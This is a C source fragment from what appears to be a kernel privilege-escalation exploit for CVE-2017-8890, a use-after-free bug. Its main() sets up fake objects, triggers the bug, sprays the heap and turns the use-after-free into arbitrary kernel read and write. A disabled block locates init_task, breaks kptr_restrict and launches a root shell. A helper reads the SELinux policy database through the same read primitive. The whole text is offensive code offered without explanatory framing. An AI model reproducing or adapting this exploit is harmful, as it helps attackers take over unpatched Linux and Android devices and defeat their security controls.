int main(int argc, char *argv[])
{
cpu_num = sysconf(_SC_NPROCESSORS_CONF);
setbuf(stdout, NULL);
printf("CVE-2017-8890 exploit. cpu_num : %d\n", cpu_num);
printf("%s(), getpid : %d, gettid() : %d\n", __func__, getpid(), gettid());
#if FORKCHILD
int x;
for ( x = 0; x < children_num ; x++ )
{
if ( (child[x] = fork() ) == 0 ) {
printf("I'm child : %d\n", x);
while(time((time_t*)NULL));
}
}
#endif
init_fake_obj();
cpuid = sched_getcpu();
if (prepare() < 0 )
err(-1,"prepare failed..");
if (trigger() < 0 )
err(-1, "trigger failed...");
keep_spraying(100);
char tester[8] = {};
for (;;) {
if (!read_at_address_pipe((void*)0xFFFFFFC000080000LL, &tester, 4)) {
printf("Turn UAF to arbitrary read/write succeeded.\n");
break;
}
}
#if 0
printf("[!] we're trying to find ksyms firstly.\n");
if ( 1 != break_kptr_restrict() )
err(-1, "ksym not found.");
init_task = (size_t)get_kallsym_address("init_task", NULL);
printf("init_task : %p\n", (void*)init_task);
found_tsk_by_swapper(init_task); /* in post_exp.c */
system("/system/bin/sh");
while(1);
#endif
return 0;
}
static inline struct flex_array* __kernel get_types_fa()
{
struct flex_array* __kernel fa = NULL;
struct policydb* pdb = malloc(sizeof(*pdb));
if (!pdb)
return NULL;
if(!policydb)
goto end;
if(!read_at_address_pipe(policydb, pdb, sizeof(*pdb)))
fa = pdb->sym_val_to_name[SYM_TYPES];
end:
free(pdb);
return fa;
}
